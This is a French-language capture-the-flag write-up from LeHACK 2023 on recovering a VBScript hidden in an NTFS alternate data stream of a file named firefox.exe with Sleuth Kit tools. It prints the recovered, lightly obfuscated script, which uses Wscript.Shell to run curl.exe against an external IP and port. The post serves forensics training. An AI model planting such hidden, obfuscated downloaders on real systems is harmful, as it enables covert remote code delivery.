Writeup #LeHACK 2023, Suspicious NTFS drive

Posted on 07/07/2023 by Seboss666

J’ai adoré le faire celui-là, c’est d’ailleurs le dernier, et il rapportait pas mal de points, alors qu’au final il était plus long que compliqué (on va pas se plaindre hein). Même si derrière, j’ai pas tout compris sur le façon dont c’était possible 🙂

Le nom ne laisse que peu de doute sur le sujet du challenge, et la description nous le confirme :

Our SOC analyst observed a log containing :

wscript.exe E:\firefox.exe:security_?????.vbs

What’s happening here ? We retrived the file system with this command :

$ sudo dd if=/dev/sda3 of=./suspicious_ntfs_drive.img bs=1M

flag format suivant : vbs filename, external IP, external port: leHACK{filename.vbs_IP_port}

Mais surprise, quand on monte l’image qu’ils nous ont fourni, on ne voit qu’un seul et unique binaire de 4Mo appelé firefox.exe. Pas chaud pour tenter de l’exécuter (si tant est que c’est possible), on se tourne vers d’autres pistes. Pour analyser des images de partitions NTFS, c’est très vite une suite d’outils appelée Sleuth Kit qui revient. Première étape, fls :

fls suspicious_ntfs_drive.img 
r/r 4-128-1:	$AttrDef
r/r 8-128-2:	$BadClus
r/r 8-128-1:	$BadClus:$Bad
r/r 6-128-1:	$Bitmap
r/r 7-128-1:	$Boot
d/d 11-144-2:	$Extend
r/r 2-128-1:	$LogFile
r/r 0-128-1:	$MFT
r/r 1-128-1:	$MFTMirr
r/r 9-128-2:	$Secure:$SDS
r/r 9-144-7:	$Secure:$SDH
r/r 9-144-4:	$Secure:$SII
r/r 10-128-1:	$UpCase
r/r 10-128-2:	$UpCase:$Info
r/r 3-128-3:	$Volume
r/r 34-128-1:	firefox.exe
r/r 34-128-3:	firefox.exe:security_launch.vbs
-/d * 31-144-1:	System Volume Information
-/r * 64-128-2:	security_launch.vbs
V/V 65:	$OrphanFiles

fls suspicious_ntfs_drive.img

r/r 4-128-1: $AttrDef

r/r 8-128-2: $BadClus

r/r 8-128-1: $BadClus:$Bad

r/r 6-128-1: $Bitmap

r/r 7-128-1: $Boot

d/d 11-144-2: $Extend

r/r 2-128-1: $LogFile

r/r 0-128-1: $MFT

r/r 1-128-1: $MFTMirr

r/r 9-128-2: $Secure:$SDS

r/r 9-144-7: $Secure:$SDH

r/r 9-144-4: $Secure:$SII

r/r 10-128-1: $UpCase

r/r 10-128-2: $UpCase:$Info

r/r 3-128-3: $Volume

r/r 34-128-1: firefox.exe

r/r 34-128-3: firefox.exe:security_launch.vbs

-/d * 31-144-1: System Volume Information

-/r * 64-128-2: security_launch.vbs

V/V 65: $OrphanFiles

On voit donc notre firefox.exe, et en effet ce qui semble être un deuxième fichier .vbs qui à première vue correspond au format de la commande qu’on nous a donné dans la description, on a donc une partie du flag. Si on le voit, on doit pouvoir le récupérer, même si on l’a vu, en montant la partition ça ne donne rien. D’autres outils du Sleuth Kit vont nous aider, en particulier icat :

icat suspicious_ntfs_drive.img 34-128-3
Dim shl
Set shl = CreateObject("Wscript.Shell")
Dim dest
aaa = replace("hello","h","w")
bbb = StrReverse("86")
ccc = Right("90018000",4)
dest = "http://"+chr(49)+"93.1"+bbb+".1.42:"+ccc+"/dothethingzuulee"
Call shl.Run("""curl.exe"" "+dest)
Set shl = Nothing
WScript.Quit
'flaag=almostthere

icat suspicious_ntfs_drive.img 34-128-3

Dim shl

Set shl = CreateObject("Wscript.Shell")

Dim dest

aaa = replace("hello","h","w")

bbb = StrReverse("86")

ccc = Right("90018000",4)

dest = "http://"+chr(49)+"93.1"+bbb+".1.42:"+ccc+"/dothethingzuulee"

Call shl.Run("""curl.exe"" "+dest)

Set shl = Nothing

WScript.Quit

'flaag=almostthere

Tiens, ça me rappelle quelques souvenirs de fichiers PHP obfusqués. En tout cas, on voit une URL et un port à trouver, donc la suite de notre flag. Certes l’adresse IP demande un poil de boulot, pas très compliqué, le résultat est donc :

leHACK{security_launch.vbs_193.168.1.42_8000}

1	leHACK{security_launch.vbs_193.168.1.42_8000}

Astuces lehack, ntfs, sleuthkit, vbscript, writeup